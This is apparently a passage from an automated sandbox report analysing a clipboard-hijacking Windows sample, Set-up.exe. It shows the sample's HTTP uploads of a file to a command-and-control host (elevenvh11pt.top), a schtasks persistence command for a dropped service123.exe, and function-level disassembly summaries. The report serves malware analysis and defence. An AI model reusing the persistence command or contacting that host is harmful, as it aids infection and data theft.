Sep 29, 2024 00:45:21.389009953 CEST	1236	OUT	Data Raw: be 82 a0 bc 56 e3 1a 6a 7e f6 8b 0a a7 9c 54 79 03 24 09 0c f5 be e7 af 90 69 56 45 c0 70 09 f7 7d 08 02 50 e7 7c 74 1c d0 5b 22 d5 e4 78 a4 c2 0b 83 81 a2 b2 67 c3 85 56 34 60 ed ac 43 67 bb e9 a8 c6 2c c7 92 4a 93 1a a6 22 3c c2 0f 98 52 9d 3b Data Ascii: Vj~Ty$iVEp}P\|t["xgV4`Cg,J"<R;Ts6/Ox\|?*T^6B"d':o-H$}az2rtJ:!_<C%5 /lUG=jC4}B4Awecg<b!YOQ]6zifU( s
Sep 29, 2024 00:45:22.213571072 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:45:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	185.244.181.140	80	7100	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 00:45:25.422115088 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary32471747 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29706 Host: elevenvh11pt.top
Sep 29, 2024 00:45:25.422158957 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 32 34 37 31 37 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 6f 6d Data Ascii: ------Boundary32471747Content-Disposition: form-data; name="file"; filename="Vomixo.bin"Content-Type: application/octet-streamyT-PB)FL%^j<#DM#Q%?:uF\Td5j=LXFJ#IoiU@Mhz> [
Sep 29, 2024 00:45:25.428942919 CEST	3708	OUT	Data Raw: 30 41 27 4a 79 a7 91 da 97 99 60 f4 0a 38 a3 77 69 f9 f4 1b 8d 9f ca 2d 74 33 40 59 34 89 20 12 16 58 43 20 ce db 59 71 f8 cb 34 21 4d ba 6c 39 95 15 cf 7a 40 f2 d5 fb 75 b2 f8 ec 6a 18 70 ae d5 f3 f2 4a 70 fa 51 2c e5 26 bd 80 a6 c7 a4 e0 b5 b0 Data Ascii: 0A'Jy`8wi-t3@Y4 XC Yq4!Ml9z@ujpJpQ,&iI"dn5M-JpU']Y%\A@,%\yjXWXy~(802)[V\|h[@m5@\JgesbLR}Hi]y6_b
Sep 29, 2024 00:45:25.428988934 CEST	7416	OUT	Data Raw: 6b 98 07 46 c5 69 7e bc 32 ca d4 d4 92 73 e2 f5 8f cd 1a 07 ff 1e 41 7d f0 59 17 04 80 7c 50 57 4e 2a 64 eb 59 2c 3b 96 d4 17 6c f4 8a 77 26 ed fb 74 e7 5f 95 da 6f 4e 35 34 63 27 fd 30 fc b8 d9 a4 af 3e 52 32 02 6a 1b 3f 9b e4 01 84 d6 9f f2 ac Data Ascii: kFi~2sA}Y\|PWNdY,;lw&t_oN54c'0>R2j?GCwE)o\|.:t94a<deZ@3LU&5:&qd@'xzx6xY'vvs7Najeu]7xl[qfCYNuB-f
Sep 29, 2024 00:45:25.431247950 CEST	2472	OUT	Data Raw: b2 7f 19 e7 eb ff 04 1d 42 8f 0c 75 a3 d2 5f d1 9f db 21 fc 2e 1f 92 80 0d 44 10 61 6f ca 32 0d c6 6b 7d fa 39 40 e2 25 ca 91 b5 7d 54 87 bc 26 1b b6 76 c3 65 a4 38 5e b6 88 4e 7c 43 07 24 55 34 3c c6 23 ca 57 47 57 0f dd e4 ed 97 f5 bf 4c 82 65 Data Ascii: Bu_!.Dao2k}9@%}T&ve8^N\|C$U4<#WGWLe};4YAM5A.,8)JZ5J4)Ul2Nl<j=5,DA?@/*R[6:@{z'v0GUvv]\:kxx)2SU_oBzo\|c8_X>K$
Sep 29, 2024 00:45:25.431277990 CEST	4986	OUT	Data Raw: 6d 94 66 c1 af 64 3a 66 6d 59 33 a0 58 ac db ad a7 84 ca 7f ff f3 ff 38 6d 63 79 93 3c 99 85 7b 67 77 24 f9 73 fb 5a 09 ea 65 cc 3f e2 ae 58 0d ca 63 b2 0c c7 ae 99 48 50 ad 4b 12 57 22 ac 38 41 56 be 06 72 12 31 2e 88 9a a6 51 e4 60 27 36 d0 e7 Data Ascii: mfd:fmY3X8mcy<{gw$sZe?XcHPKW"8AVr1.Q`'6f$eaVV'{k]_Sz_pNN"s[0R#s:/GxdNo&kU~=+ u'=s<jKSB}Ylk,"*$
Sep 29, 2024 00:45:26.200598955 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 22:45:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	18:45:07
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x440000
File size:	9'979'392 bytes
MD5 hash:	D9BDB4BA2A45C67F4DA4E431FF988605
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2307441720.0000000003F99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:46:07
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x6f0000
File size:	314'617'856 bytes
MD5 hash:	374EA50194727C58BB86AD240B785CB6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	18:46:07
Start date:	28/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xf20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:46:07
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:46:09
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x7ff72bec0000
File size:	314'617'856 bytes
MD5 hash:	374EA50194727C58BB86AD240B785CB6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:47:02
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x6f0000
File size:	314'617'856 bytes
MD5 hash:	374EA50194727C58BB86AD240B785CB6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	45.4%
Total number of Nodes:	97
Total number of Limit Nodes:	3

Executed Functions

Function 6C2C14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2C14CD
_exit.MSVCRT ref: 6C2C151A
_write.MSVCRT ref: 6C2C156A
_close.MSVCRT ref: 6C2C1579

Strings

,p>l, xrefs: 6C394AED
CONOUT$, xrefs: 6C2C14C6
terminated, xrefs: 6C2C1540
@, xrefs: 6C394AB1

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,p>l$@$CONOUT$
API String ID: 28676597-2425496301
Opcode ID: ca3bfa3cea985a3124af5d8ee475f70b82db21bfb5200e9de56faa20a7f41528
Instruction ID: ae28e28d76ecb337c637701b0c05f32b4394add5987d37a26820dba2a1fb6cad
Opcode Fuzzy Hash: ca3bfa3cea985a3124af5d8ee475f70b82db21bfb5200e9de56faa20a7f41528
Instruction Fuzzy Hash: 204148B0A083098FDB40EFB9C44569EBBF8AF49358F108A2EE8A5D7640E735D444CF56

Function 006F116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006F1238
__p__acmdln.MSVCRT ref: 006F1261
malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344
GetStartupInfoA.KERNEL32 ref: 006F1433

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 25c90dfb75ed55d88798dfc44e5285f07c6163f13ebe65d99d1cddbec49eca58
Instruction ID: de086d10d007e19dd53a0137a449d0a4e494ab82acf826b5a019a86d0314e0fc
Opcode Fuzzy Hash: 25c90dfb75ed55d88798dfc44e5285f07c6163f13ebe65d99d1cddbec49eca58
Instruction Fuzzy Hash: 96818D71908208CFDB10DFA8D8847BD7BE3FB46384F00552DDA858B311DB76A94ADB96

Function 006F15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 006F15CD
_exit.MSVCRT ref: 006F161A
_write.MSVCRT ref: 006F166A
_close.MSVCRT ref: 006F1679

Strings

CONOUT$, xrefs: 006F15C6
@, xrefs: 006F8341
terminated, xrefs: 006F1640

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: a8e5a7a592d95c51bba3a0372b908f5b1b16276fba02996b192818c4c6f9a091
Instruction ID: 740d00552cbab83b51b232dbc732058a7819eb286911b418ff4d4a9695396ce9
Opcode Fuzzy Hash: a8e5a7a592d95c51bba3a0372b908f5b1b16276fba02996b192818c4c6f9a091
Instruction Fuzzy Hash: 254147B1908309CFDB00DFB9C844A7EBBE6AB85344F00892DE998D7360EB35D805CB56

Function 6C2D9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C2D9EB0: GetClipboardSequenceNumber.USER32 ref: 6C2D9EBE

Sleep.KERNELBASE ref: 6C2D9BFF
GetClipboardSequenceNumber.USER32 ref: 6C2D9C08

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: 98f8002ced466bcf2169961546fafb177664c6122327e637b5ed00dcd926681a
Instruction ID: da964b56551eb48781b32f2207f470941293a0901590e7ce0853ad0d8560c2a3
Opcode Fuzzy Hash: 98f8002ced466bcf2169961546fafb177664c6122327e637b5ed00dcd926681a
Instruction Fuzzy Hash: 8741C8B050830A8EDB00FF74D1985AEBBF4AF59609F41492DE89697A44EB30E51DCB53

Function 006F81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,006F138E,?,?,00006EA2,006F138E), ref: 006F8271
GetProcAddress.KERNEL32 ref: 006F828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,006F138E,?,?,00006EA2,006F138E), ref: 006F829D

Strings

Failed to get function address. Error code: %d, xrefs: 006F82E0
INkIsyRSxbUrGZGTAbZU, xrefs: 006F827E
HXocObpYbsjxnCposjxnCpoVLwZ.dll, xrefs: 006F824A

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$HXocObpYbsjxnCposjxnCpoVLwZ.dll$INkIsyRSxbUrGZGTAbZU
API String ID: 145871493-2092036781
Opcode ID: de040bc629af73b4a12aec8128afd695edb9792359e534ab91966be488b3c6f2
Instruction ID: f8c981ee4d4d30a66b0879df4b310e53cbf5475315ac4e884d7e629c3f736279
Opcode Fuzzy Hash: de040bc629af73b4a12aec8128afd695edb9792359e534ab91966be488b3c6f2
Instruction Fuzzy Hash: 46317CB29086049FDB00EFB4ED495BABFE3FB45300F109928E64983214EE76E545CB96

Function 006F8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,006F138E,?,?,00006EA2,006F138E), ref: 006F8271
GetProcAddress.KERNEL32 ref: 006F828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,006F138E,?,?,00006EA2,006F138E), ref: 006F829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,006F138E,?,?,00006EA2,006F138E), ref: 006F82BD
GetLastError.KERNEL32 ref: 006F82DA
FreeLibrary.KERNEL32 ref: 006F82F3

Strings

INkIsyRSxbUrGZGTAbZU, xrefs: 006F827E
Failed to load DLL. Error code: %d, xrefs: 006F82C3
HXocObpYbsjxnCposjxnCpoVLwZ.dll, xrefs: 006F824A

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$HXocObpYbsjxnCposjxnCpoVLwZ.dll$INkIsyRSxbUrGZGTAbZU
API String ID: 1397630947-170579826
Opcode ID: 179f5e9587294bad2ec1629e1f20abea474296a92e684475ada02f2bff25c411
Instruction ID: cb2672e40822dc73be7305883ad387903a77e78c7fc42fd385914d516f5ee3d2
Opcode Fuzzy Hash: 179f5e9587294bad2ec1629e1f20abea474296a92e684475ada02f2bff25c411
Instruction Fuzzy Hash: 5E1103729046089FD700AFB8ED065BEBFA3FB46300F108668D619C3254EF32E601CA86

Function 006F13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 006F1238
__p__acmdln.MSVCRT ref: 006F1261
malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344
_amsg_exit.MSVCRT ref: 006F13EA
_initterm.MSVCRT ref: 006F140C

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: e7fa73fa74430ae4c6f5ab81eccbdb3e396eccabae210a32ce7bf61635269b90
Instruction ID: f0eca6734488879e91861bd93333af2ef3193dc043a89f782014a00121a1406e
Opcode Fuzzy Hash: e7fa73fa74430ae4c6f5ab81eccbdb3e396eccabae210a32ce7bf61635269b90
Instruction Fuzzy Hash: 754127B0A08309CFDB50EF68D88077DBBE3BB45344F10552DDA849B311DB75A946CB8A

Function 006F11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006F1238
__p__acmdln.MSVCRT ref: 006F1261
malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344
_amsg_exit.MSVCRT ref: 006F13EA
_initterm.MSVCRT ref: 006F140C

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 6ea009e8db1915589c1dd8150ae43ed312af7fc963d9b470527db2fadf4f7f57
Instruction ID: 0dd9ac06760626c88a573054ef918ef81dfc124612947ea191e0212159df61c0
Opcode Fuzzy Hash: 6ea009e8db1915589c1dd8150ae43ed312af7fc963d9b470527db2fadf4f7f57
Instruction Fuzzy Hash: 5A4148B0A04309CFDB10EF68E88077EBBE3BB45384F00552DDA848B310DB71A946CB96

Function 006F1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006F11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 006F1238
__p__acmdln.MSVCRT ref: 006F1261
malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344
GetStartupInfoA.KERNEL32 ref: 006F1433

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 466451853df73a8922ad2000258d082d11950fa21a906860ddde56b906cf59cc
Instruction ID: 78f3051b077caf8a7b49edc312d147eb81771853c70ff64cf561a4f9eafbf902
Opcode Fuzzy Hash: 466451853df73a8922ad2000258d082d11950fa21a906860ddde56b906cf59cc
Instruction Fuzzy Hash: 24513971A04208CFDB10DFA8D88077EBBF3BB49384F10552DDA449B321DB71A946DB95

Function 6C2D9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C2D9B99
CreateMutexA.KERNELBASE ref: 6C2D9BE3
Sleep.KERNELBASE ref: 6C2D9BFF
GetClipboardSequenceNumber.USER32 ref: 6C2D9C08

Strings

cyUfSaAVoKrgDgBDsopT, xrefs: 6C2D9B82, 6C2D9BCC

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: cyUfSaAVoKrgDgBDsopT
API String ID: 3689039344-4067556194
Opcode ID: 25ff007e9496d3c4c129b6d75a66304292da399a38bb65b056ef3598446d496f
Instruction ID: e0694b3bae7c31be9221f924de575afd099a4b19fc5e8815266e307e67ae6ecb
Opcode Fuzzy Hash: 25ff007e9496d3c4c129b6d75a66304292da399a38bb65b056ef3598446d496f
Instruction Fuzzy Hash: 8501D2B150830A9FCB50EF64C54979BBFF8AB49345F028819F89896640EB74A459CF92

Function 006F1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 74fcc5d77effa88fff0baf4ec3319b37911eb5a702b6929a68543b7eff66bd5d
Instruction ID: 190054ed9117be2dea87dbb6df92d2012363ae3f10fa8ff60fead6fb25eb4125
Opcode Fuzzy Hash: 74fcc5d77effa88fff0baf4ec3319b37911eb5a702b6929a68543b7eff66bd5d
Instruction Fuzzy Hash: EC312475A04319CFCB10DF64D8807A9BBF3BB49344F14852DDA489B311DB31A906CF85

Function 006F13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 006F12EB
strlen.MSVCRT ref: 006F1323
malloc.MSVCRT ref: 006F132E
memcpy.MSVCRT ref: 006F1344

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 62953071aea6d9f0fd002eccfe7571ab636a96969f41862b20b7e43e8a127d47
Instruction ID: 02471aa941dc49ea836fadd35ba69a97d10a1b8ce4f65a356d27ad3f88f785d2
Opcode Fuzzy Hash: 62953071aea6d9f0fd002eccfe7571ab636a96969f41862b20b7e43e8a127d47
Instruction Fuzzy Hash: BE21F2B5D05309CFCB10DF64D8806ADBBF2BB88300F11896DDA48AB320DB30A906DF85

Function 6C2DB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

